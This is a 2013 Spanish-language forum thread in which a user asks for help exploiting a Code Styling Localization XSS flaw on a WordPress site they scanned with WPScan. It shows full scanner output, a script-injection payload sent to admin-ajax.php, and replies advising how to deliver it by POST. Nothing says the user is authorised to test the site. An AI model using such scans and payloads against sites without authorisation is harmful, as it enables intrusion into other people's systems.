Cross Site Scripting (XSS) HELP!

Iniciado por krraskl13, Enero 11, 2013, 11:22:31 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 11, 2013, 11:22:31 PM Ultima modificación: Noviembre 23, 2014, 01:32:02 PM por Expermicid
Hola, me sale una vulnerabilidad en un WordPress del plugin WordPress CodeStyling Localization 1.99.16, y el escaner me devuelve este exploit:

Código: php
http://packetstormsecurity.com/files/112709/


Pero no consigo lanzarlo.. Alguien me ayuda ??


WPScan, mira esto es lo que me devuelve:

Código: php
root@bt:~/wpscan# ruby wpscan.rb --url http://www.*site*.com --enumerate vp
____________________________________________________
__          _______   _____                 
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0r2593a2e

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

| URL: http://www.*site*.com/
| Started on Sat Jan 12 07:38:50 2013

[+] The WordPress theme in use is iblogpro v4.2.6
[!] The WordPress 'http://www.*site*.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.*site*.com/wp-includes/rss-functions.php'
[+] WordPress version 3.5 identified from meta generator

[!] We have identified 2 vulnerabilities from the version number :

| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner

| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

[+] Enumerating installed plugins (only vulnerable ones) ...

Checking for 321 total plugins... 100% complete.

[+] We found 1 plugins:

| Name: codestyling-localization
| Location: http://www.*site*.com/wp-content/plugins/codestyling-localization/
| Directory listing enabled: Yes
| Readme: http://www.*site*.com/wp-content/plugins/codestyling-localization/readme.txt
|
| [!] Code Styling Localization <= 1.99.16 Cross Site Scripting
| * Reference: http://packetstormsecurity.org/files/112709/

[+] Finished at Sat Jan 12 07:39:39 2013
[+] Elapsed time: 00:00:48

Primero que nada el Cross Site Scripting tiende a  usar como acrónimo  Xss no Css por otra parte como te podemos ayudar si no nos has proporcionado la URL.



Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Yo creo que nunca has leído sobre XSS... ¿Así como vas a ser capaz de usar el exploit?
Twitter: @The_Pr0ph3t
[email protected]

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Primero que nada el Cross Site Scripting tiende a  usar como acrónimo  Xss no Css por otra parte como te podemos ayudar si no nos has proporcionado la URL.



Saludos,
Dedalo

Corregido!! Perdon por mi fallo.

Por otra parte queria decir que si he leido sobre XSS, solo que lo escribí mal y no me di cuenta.
El problema es que cuando abro  la direccion que me indica el exploit http://www.*site*.com/wp-admin/admin-ajax.php me sale una pagina en blanco con un 0 arriba a la izquierda. Y ahi no hay ningun buscador ni ningun formulario para hacer XSS.
Entonces lo he probado en la URL de esta forma http://www.*site*.com/wp-admin/admin-ajax.php?action=csp_po_dlg_new&name="><script>alert(1)</script>

Pero tampoco. Por eso he pedido ayuda.

Es por post brother no solo es leer de xss sino como funciona ahi bien claro dice en el exploit POST DATA debes enviarlo por post a ese .php ya sea con HackBar o con Live Http Headers...


Saludos,
Dedalo.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tambien probe con  el Live Http Headers..  Que se me olvido comentarlo, cargue la pagina  http://www.*site*.com/wp-admin/admin-ajax.php en mozzilla y despues le di a repetir con el post:action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero recargaba la pagina y seguia igual..

aun que siento que estás haciendo algo mal quizás no es vulnerable... el scanner pudo tirar algo que se llama "Falso Positivo"



Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero estar haciendo algo mal.. Porque es la única vulnerabilidad que sale!!
Asi que no se que hacer..